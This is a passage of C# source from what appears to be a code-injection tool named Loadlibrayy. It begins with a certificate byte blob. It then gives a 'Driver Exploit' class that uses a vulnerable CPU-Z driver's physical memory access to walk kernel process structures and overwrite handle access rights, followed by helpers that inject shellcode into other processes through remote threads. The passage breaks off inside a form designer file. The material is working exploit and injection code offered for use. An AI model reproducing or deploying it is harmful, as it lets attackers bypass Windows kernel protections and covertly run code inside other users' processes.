0x03, 0x55, 0x04, 0x0B, 0x13, 0x04, 0x4D, 0x4F, 0x50, 0x52, 0x31, 0x27, 0x30, 0x25, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x1E, 0x6E, 0x43, 0x69, 0x70, 0x68, 0x65, 0x72, 0x20, 0x4E, 0x54, 0x53, 0x20, 0x45, 0x53, 0x4E, 0x3A, 0x34, 0x44, 0x45, 0x39, 0x2D, 0x30, 0x43, 0x35, 0x45, 0x2D, 0x33, 0x45, 0x30, 0x39, 0x31, 0x2B, 0x30, 0x29, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x22, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x20, 0x53, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x20, 0x4D, 0x61, 0x73, 0x74, 0x65, 0x72, 0x20, 0x43, 0x6C, 0x6F, 0x63, 0x6B, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x02, 0x05, 0x00, 0xDB, 0xDE, 0x4E, 0x85, 0x30, 0x22, 0x18, 0x0F, 0x32, 0x30, 0x31, 0x36, 0x31, 0x31, 0x32, 0x32, 0x30, 0x34, 0x35, 0x36, 0x33, 0x37, 0x5A, 0x18, 0x0F, 0x32, 0x30, 0x31, 0x36, 0x31, 0x31, 0x32, 0x33, 0x30, 0x34, 0x35, 0x36, 0x33, 0x37, 0x5A, 0x30, 0x74, 0x30, 0x3A, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x84, 0x59, 0x0A, 0x04, 0x01, 0x31, 0x2C, 0x30, 0x2A, 0x30, 0x0A, 0x02, 0x05, 0x00, 0xDB, 0xDE, 0x4E, 0x85, 0x02, 0x01, 0x00, 0x30, 0x07, 0x02, 0x01, 0x00, 0x02, 0x02, 0x17, 0xA3, 0x30, 0x07, 0x02, 0x01, 0x00, 0x02, 0x02, 0x1A, 0xE9, 0x30, 0x0A, 0x02, 0x05, 0x00, 0xDB, 0xDF, 0xA0, 0x05, 0x02, 0x01, 0x00, 0x30, 0x36, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x84, 0x59, 0x0A, 0x04, 0x02, 0x31, 0x28, 0x30, 0x26, 0x30, 0x0C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x84, 0x59, 0x0A, 0x03, 0x01, 0xA0, 0x0A, 0x30, 0x08, 0x02, 0x01, 0x00, 0x02, 0x03, 0x16, 0xE3, 0x60, 0xA1, 0x0A, 0x30, 0x08, 0x02, 0x01, 0x00, 0x02, 0x03, 0x07, 0xA1, 0x20, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x03, 0x82, 0x01, 0x01, 0x00, 0x89, 0xA0, 0x65, 0x29, 0xD2, 0x10, 0x71, 0xAB, 0x3C, 0xF4, 0xDF, 0xC5, 0x03, 0xC2, 0xF7, 0xC7, 0xC0, 0x42, 0x09, 0x25, 0xCA, 0x4B, 0xF7, 0x15, 0x5C, 0x15, 0x70, 0xCA, 0x59, 0xBF, 0x2D, 0xD6, 0xAD, 0x4B, 0x17, 0x24, 0x16, 0xB2, 0xA0, 0x27, 0x61, 0x15, 0x83, 0x35, 0x40, 0xC2, 0x69, 0x3A, 0xF3, 0x8B, 0xE1, 0x7F, 0x5C, 0x1D, 0xA7, 0xF1, 0xB7, 0x84, 0xF7, 0xA5, 0x06, 0xCC, 0xDF, 0xAF, 0xA4, 0x1D, 0x85, 0x89, 0x55, 0x6E, 0x55, 0x79, 0xA5, 0x8C, 0xA2, 0x85, 0x8E, 0x78, 0x48, 0xD6, 0x46, 0x2F, 0x28, 0xEF, 0x03, 0x68, 0x3A, 0x39, 0x15, 0xB6, 0x8D, 0x04, 0x1A, 0x49, 0x37, 0x3D, 0x70, 0x6F, 0x48, 0xAD, 0x26, 0x1B, 0x4E, 0x70, 0x07, 0xFF, 0xD4, 0xE4, 0xA8, 0x9E, 0x5C, 0xB1, 0x6A, 0xE4, 0xE2, 0xEE, 0xF2, 0xF6, 0x0A, 0x90, 0x41, 0xE4, 0x72, 0x4F, 0xEE, 0x87, 0xF9, 0x33, 0x17, 0xE1, 0x90, 0x05, 0x85, 0x62, 0xE5, 0x62, 0x76, 0xED, 0xC3, 0x71, 0xD5, 0x2B, 0x32, 0xA0, 0xC3, 0xA8, 0xC8, 0xF8, 0x5D, 0xAF, 0x4B, 0x0A, 0x1A, 0xFD, 0xCB, 0x7F, 0x1E, 0xAD, 0xF6, 0xC0, 0x67, 0xF6, 0x3A, 0x8F, 0x1E, 0xEF, 0x9F, 0x88, 0x51, 0xF7, 0xEB, 0xB0, 0x58, 0x56, 0xCA, 0x3D, 0xC7, 0x13, 0xC0, 0x29, 0x59, 0x97, 0x91, 0x0B, 0x0A, 0x6D, 0x9A, 0x6E, 0x15, 0x79, 0xDB, 0xDF, 0x4B, 0xD2, 0x58, 0xD2, 0xBB, 0xF2, 0x7D, 0x29, 0x15, 0x80, 0xB3, 0x4B, 0xDF, 0x79, 0x6C, 0x34, 0x7C, 0x76, 0xEF, 0xD4, 0xCC, 0x0D, 0x61, 0xF8, 0x38, 0xDA, 0x70, 0x5C, 0xEF, 0x5A, 0x89, 0x9A, 0x80, 0x75, 0xE6, 0xFE, 0x72, 0xEE, 0x9A, 0x13, 0x6C, 0x5C, 0x56, 0xE6, 0x25, 0x15, 0x9E, 0x3C, 0x2B, 0xA7, 0x09, 0x42, 0xB5, 0x8E, 0x47, 0xD7, 0x17, 0xD0, 0xBB, 0x40, 0x4C, 0x8A, 0x50, 0x58, 0x31, 0x82, 0x02, 0xF5, 0x30, 0x82, 0x02, 0xF1, 0x02, 0x01, 0x01, 0x30, 0x81, 0x93, 0x30, 0x7C, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x26, 0x30, 0x24, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x1D, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x2D, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x20, 0x50, 0x43, 0x41, 0x20, 0x32, 0x30, 0x31, 0x30, 0x02, 0x13, 0x33, 0x00, 0x00, 0x00, 0xB1, 0x71, 0x13, 0x79, 0xDF, 0x75, 0xF6, 0x35, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB1, 0x30, 0x0D, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0xA0, 0x82, 0x01, 0x32, 0x30, 0x1A, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x03, 0x31, 0x0D, 0x06, 0x0B, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x10, 0x01, 0x04, 0x30, 0x2F, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x04, 0x31, 0x22, 0x04, 0x20, 0x4A, 0x83, 0x38, 0xEF, 0x3E, 0x0A, 0xAE, 0x7D, 0x76, 0x74, 0xA6, 0x97, 0x5D, 0x3A, 0xD4, 0xF7, 0x75, 0x90, 0x19, 0xF4, 0x44, 0x90, 0x11, 0xBE, 0x02, 0x62, 0xCF, 0xD8, 0x48, 0x21, 0x46, 0x95, 0x30, 0x81, 0xE2, 0x06, 0x0B, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x10, 0x02, 0x0C, 0x31, 0x81, 0xD2, 0x30, 0x81, 0xCF, 0x30, 0x81, 0xCC, 0x30, 0x81, 0xB1, 0x04, 0x14, 0x3A, 0xBA, 0xDF, 0x93, 0x28, 0x65, 0xE4, 0x7A, 0xD3, 0xE7, 0xA3, 0xF6, 0xE2, 0xA7, 0x44, 0x6E, 0x58, 0xAA, 0x53, 0xD2, 0x30, 0x81, 0x98, 0x30, 0x81, 0x80, 0xA4, 0x7E, 0x30, 0x7C, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x26, 0x30, 0x24, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x1D, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x2D, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x20, 0x50, 0x43, 0x41, 0x20, 0x32, 0x30, 0x31, 0x30, 0x02, 0x13, 0x33, 0x00, 0x00, 0x00, 0xB1, 0x71, 0x13, 0x79, 0xDF, 0x75, 0xF6, 0x35, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB1, 0x30, 0x16, 0x04, 0x14, 0x88, 0x2B, 0x73, 0x8B, 0xC9, 0x30, 0xAA, 0x7E, 0xD8, 0xD9, 0x66, 0x8A, 0xE5, 0x30, 0x4F, 0x0D, 0x60, 0xA7, 0x36, 0x64, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x0B, 0x05, 0x00, 0x04, 0x82, 0x01, 0x00, 0x89, 0x69, 0xED, 0xE6, 0x8C, 0x34, 0x91, 0xDA, 0xDE, 0x46, 0x7B, 0x0C, 0x8A, 0x7A, 0xFC, 0x37, 0x7E, 0xB3, 0x52, 0x3B, 0x87, 0xA1, 0x74, 0x17, 0xF6, 0x4D, 0xFF, 0x8F, 0x11, 0xFC, 0xF4, 0x2C, 0x59, 0x81, 0xCE, 0xA5, 0xA9, 0x2F, 0x86, 0xA0, 0x6C, 0x13, 0xB3, 0xD0, 0xFA, 0xAB, 0xD6, 0x04, 0x2A, 0x8C, 0xDC, 0x00, 0x90, 0xB8, 0x20, 0x3B, 0xE8, 0xD6, 0x89, 0xBA, 0x7D, 0x4A, 0x9B, 0x0A, 0x8F, 0xDF, 0xED, 0x99, 0xD9, 0xA5, 0x69, 0x01, 0x3D, 0x08, 0xAB, 0x21, 0x86, 0x3A, 0x8E, 0x1B, 0x3B, 0xCF, 0x60, 0x66, 0xE8, 0x5E, 0x4E, 0x60, 0x18, 0xB1, 0xFD, 0x6C, 0x22, 0x7D, 0xDB, 0x88, 0xAF, 0x7E, 0xF7, 0xD7, 0x05, 0xF1, 0x89, 0xA5, 0x61, 0x86, 0xF1, 0x13, 0x00, 0xC8, 0xDA, 0x73, 0x73, 0xDB, 0xF9, 0xFC, 0xF7, 0xDB, 0xE0, 0x7F, 0x75, 0x69, 0x5B, 0xDE, 0x3E, 0xA2, 0x45, 0xAD, 0x1F, 0x96, 0xB2, 0x87, 0x0F, 0xAF, 0x43, 0x90, 0x97, 0x89, 0x39, 0x24, 0x0C, 0xB9, 0xB7, 0xAF, 0x51, 0xFF, 0x2F, 0x4D, 0x26, 0x91, 0xE2, 0xAA, 0xB2, 0x54, 0xEB, 0x59, 0x68, 0x4B, 0xA2, 0xE2, 0x60, 0x98, 0xD6, 0x78, 0x0D, 0xD0, 0xA1, 0x6D, 0xFA, 0xCD, 0x7E, 0x79, 0x45, 0x7E, 0x0B, 0x38, 0x2A, 0xB1, 0x95, 0xE0, 0xC2, 0x1F, 0x54, 0x97, 0x6E, 0xDA, 0x56, 0x9F, 0x0F, 0x97, 0xA3, 0x55, 0xA1, 0x49, 0x55, 0xA5, 0x36, 0xAA, 0xAA, 0xD1, 0x73, 0x66, 0xF7, 0x3D, 0x99, 0x33, 0x91, 0xB2, 0x35, 0xD2, 0x9C, 0xA5, 0x51, 0x23, 0x3B, 0x30, 0x8F, 0x25, 0xDF, 0x0B, 0xD1, 0x20, 0x06, 0xBD, 0xF1, 0xFF, 0x79, 0x32, 0x8B, 0x7C, 0x63, 0xE8, 0x9A, 0xF2, 0x55, 0x63, 0x61, 0x87, 0x76, 0x30, 0x75, 0x3E, 0x8B, 0x68, 0x3D, 0x5B, 0xAE, 0xEC, 0xCF, 0x03, 0x4E, 0x79, 0x22, 0x86, 0xDC, 0xCC, 0x00, 0x00, 0x00, 0x00, 0x00 }; } } ================================================ FILE: Driver Exploit/ElevateHandle.cs ================================================ using Loadlibrayy.Logger; using Loadlibrayy.Natives; using System; using System.Collections; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Threading.Tasks; namespace DriverExploits { public unsafe static class ElevateHandle { public static CPUZ Driver = new CPUZ(); #region Private Properties private static NT.ProcessContext g_Context { get; set; } private static ulong g_VersionLong { get; set; } private static uint g_OffsetDirectoryTable { get; set; } private static uint g_OffsetProcessId { get; set; } private static uint g_OffsetProcessLinks { get; set; } private static uint g_OffsetObjectTable { get; set; } private static bool g_IsWindows7Machine { get; set; } #endregion public static void Attach() => g_Context = FindProcessInfo((uint)Process.GetCurrentProcess().Id); public static bool Elevate(ulong handle, dynamic desiredAccess) { var handleTableAddress = ReadSystemMemory(g_Context.KernelEntry + g_OffsetObjectTable); var handleTable = ReadSystemMemory<_HANDLE_TABLE>(handleTableAddress); NT._HANDLE_TABLE_ENTRY* entryAddress = g_IsWindows7Machine ? ExpLookupHandleTableEntryWin7(&handleTable, handle) : ExpLookupHandleTableEntry(&handleTable, handle); if ((ulong)entryAddress == 0) throw new Exception("ExpLookupHandleTableEntry/7 failed"); var entry = ReadSystemMemory((ulong)entryAddress); bool didElevate = WriteSystemMemory((ulong)entryAddress + sizeof(ulong), (ulong)desiredAccess); Log.LogInfo($"Elevating {handle.ToString("x2")} -> {desiredAccess.ToString("x2")} ? {didElevate}"); return didElevate; } public static void UpdateDynamicData() { NT._OSVERSIONINFOEXW osvi = new NT._OSVERSIONINFOEXW() { dwOSVersionInfoSize = (uint)Marshal.SizeOf(typeof(NT._OSVERSIONINFOEXW)) }; NT.RtlGetVersion(&osvi); g_VersionLong = (osvi.dwMajorVersion << 16) | (osvi.dwMinorVersion << 8) | osvi.wServicePackMajor; switch (g_VersionLong) { case 0x060101/*win 7*/: g_IsWindows7Machine = true; g_OffsetDirectoryTable = 0x028; g_OffsetProcessId = 0x180; g_OffsetProcessLinks = 0x188; g_OffsetObjectTable = 0x200; break; case 0x060200/*win 8*/: case 0x060300/*win 8.1*/: g_OffsetDirectoryTable = 0x028; g_OffsetProcessId = 0x2e0; g_OffsetProcessLinks = 0x2e8; g_OffsetObjectTable = 0x408; break; case 0x0A0000 /*win 10*/: { switch (osvi.dwBuildNumber) { case 10240: case 10586: case 14393: g_OffsetDirectoryTable = 0x028; g_OffsetProcessId = 0x2E8; g_OffsetProcessLinks = 0x2F0; g_OffsetObjectTable = 0x418; break; case 15063: case 16299: g_OffsetDirectoryTable = 0x028; g_OffsetProcessId = 0x2E0; g_OffsetProcessLinks = 0x2E8; g_OffsetObjectTable = 0x418; break; default: throw new Exception("Unsupported dwBuildNumber"); } break; } default: throw new Exception("Unsupported version_long"); } } // IDA F5 LOL private static NT._HANDLE_TABLE_ENTRY* ExpLookupHandleTableEntryWin7(void* HandleTable, ulong Handle) { ulong v2; // r8@2 ulong v3; // rcx@2 ulong v4; // r8@2 ulong result; // rax@4 ulong v6; // [sp+8h] [bp+8h]@1 ulong table = (ulong)HandleTable; v6 = Handle; v6 = Handle & 0xFFFFFFFC; if (v6 >= *(uint*)(table + 92)) { result = 0; } else { v2 = (*(ulong*)table); v3 = (*(ulong*)table) & 3; v4 = v2 - (uint)v3; if ((uint)v3 > 0) { if ((uint)v3 == 1) result = ReadSystemMemory((((Handle - (Handle & 0x3FF)) >> 7) + v4)) + 4 * (Handle & 0x3FF); else result = ReadSystemMemory((ulong)(ReadSystemMemory((ulong)(((((Handle - (Handle & 0x3FF)) >> 7) - (((Handle - (Handle & 0x3FF)) >> 7) & 0xFFF)) >> 9) + v4)) + (((Handle - (Handle & 0x3FF)) >> 7) & 0xFFF))) + 4 * (Handle & 0x3FF); } else { result = v4 + 4 * Handle; } } return (NT._HANDLE_TABLE_ENTRY*)result; } private static NT._HANDLE_TABLE_ENTRY* ExpLookupHandleTableEntry(void* HandleTable, ulong Handle) { ulong v2; // rdx@1 long v3; // r8@2 ulong result; // rax@4 ulong v5; ulong a1 = (ulong)HandleTable; v2 = Handle & 0xFFFFFFFFFFFFFFFCu; if (v2 >= *(uint*)a1) { result = 0; } else { v3 = (long)*(ulong*)(a1 + 8); if ((*(ulong*)(a1 + 8) & 3) > 0) { if ((*(uint*)(a1 + 8) & 3) == 1) { v5 = ReadSystemMemory((ulong)v3 + 8 * (v2 >> 10) - 1); result = v5 + 4 * (v2 & 0x3FF); } else { v5 = ReadSystemMemory(ReadSystemMemory((ulong)v3 + 8 * (v2 >> 19) - 2) + 8 * ((v2 >> 10) & 0x1FF)); result = v5 + 4 * (v2 & 0x3FF); } } else { result = (ulong)v3 + 4 * v2; } } return (NT._HANDLE_TABLE_ENTRY*)result; } // MEMORY FUNCTIONS private static T ReadSystemMemory(ulong basepointer) { var buf = (ulong*)Marshal.AllocHGlobal(Marshal.SizeOf(typeof(T))); if (!ReadSystemMemory(basepointer, (ulong)buf, (uint)Marshal.SizeOf(typeof(T)))) throw new Exception("Read failed"); T result = (T)Marshal.PtrToStructure((IntPtr)buf, typeof(T)); Marshal.FreeHGlobal((IntPtr)buf); return result; } private static bool WriteSystemMemory(ulong basepointer, T value) { var buf = (ulong)Marshal.AllocHGlobal(Marshal.SizeOf(typeof(T))); Marshal.StructureToPtr(value, (IntPtr)buf, false); bool success = WriteSystemMemory(basepointer, buf, (uint)Marshal.SizeOf(typeof(T))); Marshal.FreeHGlobal((IntPtr)buf); return success; } private static bool ReadSystemMemory(ulong basepointer, ulong buf, uint len) { ulong phys = Driver.TranslateLinearAddress(g_Context.DirectoryBase, basepointer); return Driver.ReadPhysicalAddress(phys, buf, len); } private static bool WriteSystemMemory(ulong basepointer, ulong buf, uint len) { ulong phys = Driver.TranslateLinearAddress(g_Context.DirectoryBase, basepointer); return Driver.WritePhysicalAddress(phys, buf, len); } private static ulong GetKernelBase() { ulong buffer; uint bufferSize = 2048; buffer = (ulong)Marshal.AllocHGlobal((int)bufferSize); uint status = NT.NtQuerySystemInformation(11/*SystemModuleInformation*/, buffer, (uint)bufferSize, out bufferSize); if (status == 0xC0000004L/*STATUS_INFO_LENGTH_MISMATCH*/) { Marshal.FreeHGlobal((IntPtr)buffer); buffer = (ulong)Marshal.AllocHGlobal((int)bufferSize); status = NT.NtQuerySystemInformation(11/*SystemModuleInformation*/, buffer, (uint)bufferSize, out bufferSize); } if (status != 0) throw new Exception("GetKernelBase Failed"); NT._RTL_PROCESS_MODULES* modulesPointer = (NT._RTL_PROCESS_MODULES*)buffer; return (ulong)modulesPointer->Modules.ImageBase; } private static byte* FindKernelProcedure(string szName) { ulong ntoskrnlHandle = NT.LoadLibrary("ntoskrnl.exe"); ulong kernelBase = GetKernelBase(); ulong functionPointer = NT.GetProcAddress(ntoskrnlHandle, szName); return (byte*)(functionPointer - ntoskrnlHandle + kernelBase); } private static NT.ProcessContext FindProcessInfo(uint targetProcessId) { NT.ProcessContext processContext = new NT.ProcessContext() { ProcessId = 0 }; // GET POINTER TO THE SYSTEM EPROCESS ulong eprocessPointer = (ulong)FindKernelProcedure("PsInitialSystemProcess"); // READ EPROCESS ADDRESS ulong ntosEntry = Driver.ReadSystemAddress(eprocessPointer); var listHead = ntosEntry + g_OffsetProcessLinks; var lastLink = Driver.ReadSystemAddress(listHead + sizeof(ulong)); // ITERATE ALL PROCESSES for (var currentLink = listHead; currentLink != lastLink; currentLink = Driver.ReadSystemAddress(currentLink)) { var currentEntry = currentLink - g_OffsetProcessLinks; var processId = Driver.ReadSystemAddress(currentEntry + g_OffsetProcessId); // PID is a match if (processId == targetProcessId) { processContext.ProcessId = targetProcessId; processContext.DirectoryBase = Driver.ReadSystemAddress(currentEntry + g_OffsetDirectoryTable); processContext.KernelEntry = currentEntry; break; } } return processContext; } [StructLayout(LayoutKind.Sequential)] public struct _HANDLE_TABLE { public ulong TableCode; public ulong QuotaProcess; public ulong UniqueProcessId; public ulong HandleLock; public ulong Flink; public ulong Blink; public ulong HandleContentionEvent; public ulong DebugInfo; public int ExtraInfoPages; public uint Flags; public uint FirstFreeHandle; public ulong LastFreeHandleEntry; public uint HandleCount; public uint NextHandleNeedingPool; public uint HandleCountHighWatermark; } } } ================================================ FILE: Extensions/ProcessExtensions.cs ================================================ using Loadlibrayy.Logger; using Loadlibrayy.Natives; using System; using System.Collections.Generic; using System.ComponentModel; using System.Diagnostics; using System.IO; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Threading.Tasks; using Loadlibrayy.Helpers; using System.Runtime.CompilerServices; namespace Loadlibrayy.Extensions { // THIS CLASS IS A WRAPPER FOR THE MANAGED PROCESS/PROCESSTHREAD CLASS public unsafe static class WhatMicrosoftShouldHaveDone { #region Remote Code Execution public static void InjectShellcode(this Process process, byte[] shellcodeBuffer) { // WRITE SHELLCODE TO TARGET MEMORY var shellcodeRemoteCall = process.AllocateAndWrite(shellcodeBuffer, NT.AllocationType.Commit | NT.AllocationType.Reserve, NT.MemoryProtection.ExecuteReadWrite); // CALL THE SHELLCODE TO CALL OUR SHELLCODE var shellcodeThread = process.CreateThread(shellcodeRemoteCall, 0, out ulong threadId); // WAIT FOR THE THREAD TO FINISH NTM.WaitForThread(shellcodeThread); // FREE THE SHELLCODE process.FreeMemory(shellcodeRemoteCall); } #endregion #region Information public static ulong GetPebAddress(this Process process) { NT.PROCESS_BASIC_INFORMATION pbi = new NT.PROCESS_BASIC_INFORMATION(); NT.NtQueryInformationProcess(process.Handle, 0, &pbi, pbi.Size, IntPtr.Zero); return pbi.PebBaseAddress; } public static NT._PEB_LDR_DATA GetLoaderData(this Process process) { var peb = process.Read(process.GetPebAddress()); return process.Read(peb.Ldr); } public static void WriteLoaderData(this Process process, NT._PEB_LDR_DATA ldrData) { var peb = process.Read(process.GetPebAddress()); process.Write(ldrData, peb.Ldr); } #endregion #region Memory public static ulong AllocateMemory(this Process process, uint length, NT.AllocationType allocationType, NT.MemoryProtection memoryProtection) => NT.VirtualAllocEx(process.Handle, 0, length, allocationType, memoryProtection); public static bool FreeMemory(this Process process, ulong memoryPointer) => NT.VirtualFreeEx(process.Handle, memoryPointer, 0, NT.AllocationType.Release); public static NT.MEMORY_BASIC_INFORMATION VirtualQuery(this Process process, ulong memoryPointer) { var structSize = (uint)Marshal.SizeOf(typeof(NT.MEMORY_BASIC_INFORMATION)); NT.VirtualQueryEx(process.Handle, memoryPointer, out NT.MEMORY_BASIC_INFORMATION mem, structSize); return mem; } public static NT.MemoryProtection VirtualProtect(this Process process, ulong memoryPointer, int size, NT.MemoryProtection newProtect) { if (!NT.VirtualProtectEx(process.Handle, memoryPointer, size, newProtect, out NT.MemoryProtection oldProtect)) throw new Exception($"VirtualProtect - VirtualProtectEx() failed - {Marshal.GetLastWin32Error().ToString("x2")}"); return oldProtect; } public static ulong AllocateAndWrite(this Process process, byte[] buffer, NT.AllocationType allocationType, NT.MemoryProtection memoryProtection) { ulong allocatedMemory = process.AllocateMemory((uint)buffer.Length, allocationType, memoryProtection); process.WriteRawMemory(buffer, allocatedMemory); return allocatedMemory; } public static void WriteRawMemory(this Process process, byte[] buffer, ulong memoryPointer) { //NT.MemoryProtection oldProtect = process.VirtualProtect(memoryPointer, buffer.Length, NT.MemoryProtection.ExecuteReadWrite); if (!NT.WriteProcessMemory(process.Handle, memoryPointer, buffer, (uint)buffer.Length, 0)) throw new Exception($"WriteBuffer - WriteProcessMemory() failed - {Marshal.GetLastWin32Error().ToString("x2")}"); //process.VirtualProtect(memoryPointer, buffer.Length, oldProtect); } public static byte[] ReadRawMemory(this Process process, ulong memoryPointer, int size) { byte[] buffer = new byte[size]; if (!NT.ReadProcessMemory(process.Handle, memoryPointer, buffer, buffer.Length, 0)) throw new Exception($"ReadRawMemory - ReadProcessMemory() failed - {Marshal.GetLastWin32Error().ToString("x2")}"); return buffer; } public static void Write(this Process process, T value, ulong memoryPointer) where T : struct { byte[] buffer = Tools.GetBytes(value); process.WriteRawMemory(buffer, memoryPointer); } public static T Read(this Process process, ulong memoryPointer) where T : struct { byte[] buffer = process.ReadRawMemory(memoryPointer, Unsafe.SizeOf()); return Tools.GetStructure(buffer); } public static void NukeMemoryPage(this Process process, ulong memoryPointer, int size = 0) { // GENERATE BYTE ARRAY OF TOTAL SIZE OF PAGE byte[] headerBuffer = new byte[size == 0 ? (int)process.VirtualQuery(memoryPointer).RegionSize : size]; // FILL OUT WITH RANDOM BYTES NTM.RandomEngine.NextBytes(headerBuffer); // LMAO BYE process.WriteRawMemory(headerBuffer, memoryPointer); } public static ulong CreateSection(this Process process, NT.MemoryProtection memoryProtection, long size) { var result = NT.NtCreateSection(out ulong sectionHandle, NT.ACCESS_MASK.GENERIC_ALL, 0, out size, memoryProtection, 0x8000000 /*SEC_COMMIT*/, 0); if (result != 0) throw new Exception($"CreateSection - NtCreateSection() failed - {result.ToString("x2")}"); return sectionHandle; } public static ulong MapSection(this Process process, ulong sectionHandle, NT.MemoryProtection memoryProtection) { ulong memoryPointer = 0; var result = NT.NtMapViewOfSection(sectionHandle, process.Handle, ref memoryPointer, 0, 0, 0, out uint viewSize, 2, 0, memoryProtection); if (result != 0) throw new Exception($"MapSection - NtMapViewOfSection() failed - {result.ToString("x2")}"); return memoryPointer; } public static uint UnmapSection(this Process process, ulong baseAddress) => NT.NtUnmapViewOfSection(process.Handle, baseAddress); #endregion #region Modules public static ulong GetModuleByName(this Process process, string moduleName) { ulong[] moduleHandleArray = new ulong[1000]; fixed (ulong* hMods = moduleHandleArray) { if (NT.EnumProcessModules(process.Handle, (ulong)hMods, (uint)(sizeof(ulong) * moduleHandleArray.Length), out uint cbNeeded) > 0) { for (int moduleIndex = 0; moduleIndex < cbNeeded / sizeof(ulong); moduleIndex++) { string name = NTM.GetModuleBaseName(process.Handle, moduleHandleArray[moduleIndex]); if (String.Equals(name, moduleName, StringComparison.InvariantCultureIgnoreCase)) return moduleHandleArray[moduleIndex]; } } } return 0; } public static Dictionary GetModules(this Process process) { var result = new Dictionary(); ulong[] moduleHandleArray = new ulong[1000]; fixed (ulong* hMods = moduleHandleArray) { if (NT.EnumProcessModules(process.Handle, (ulong)hMods, (uint)(sizeof(ulong) * moduleHandleArray.Length), out uint cbNeeded) > 0) { for (int moduleIndex = 0; moduleIndex < cbNeeded / sizeof(ulong); moduleIndex++) { string name = NTM.GetModuleBaseName(process.Handle, moduleHandleArray[moduleIndex]); result[name.ToLower()] = moduleHandleArray[moduleIndex]; //if (String.Equals(name, moduleName, StringComparison.InvariantCultureIgnoreCase)) // return moduleHandleArray[moduleIndex]; } } } return result; } #endregion #region Threads public static ulong CreateThread(this Process process, ulong startAddress, ulong argumentAddress, out ulong threadId) { return NT.CreateRemoteThread(process.Handle, 0, 0, startAddress, argumentAddress, 0, out threadId); } public static uint CreateAndWaitForThread(this Process process, ulong startAddress, ulong argumentAddress, out ulong threadHandle) { threadHandle = NT.CreateRemoteThread(process.Handle, 0, 0, startAddress, argumentAddress, 0, out ulong threadId); NTM.WaitForThread(threadHandle); return NTM.GetThreadExitCode(threadHandle); } public static ulong GetNativeHandle(this ProcessThread thread, NT.ThreadAccess accessRights) => NTM.OpenThread(accessRights, thread.Id); #endregion } } ================================================ FILE: Forms/DankInjectionForm.Designer.cs ================================================ namespace Loadlibrayy { partial class DankInjectionForm { /// /// Required designer variable. /// private System.ComponentModel.IContainer components = null; /// /// Clean up any resources being used. /// /// true if managed resources should be disposed; otherwise, false. protected override void Dispose(bool disposing) { if (disposing && (components != null)) { components.Dispose(); } base.Dispose(disposing); } #region Windows Form Designer generated code /// /// Required method for Designer support - do not modify /// the contents of this method with the code editor. /// private void InitializeComponent() { this.components = new 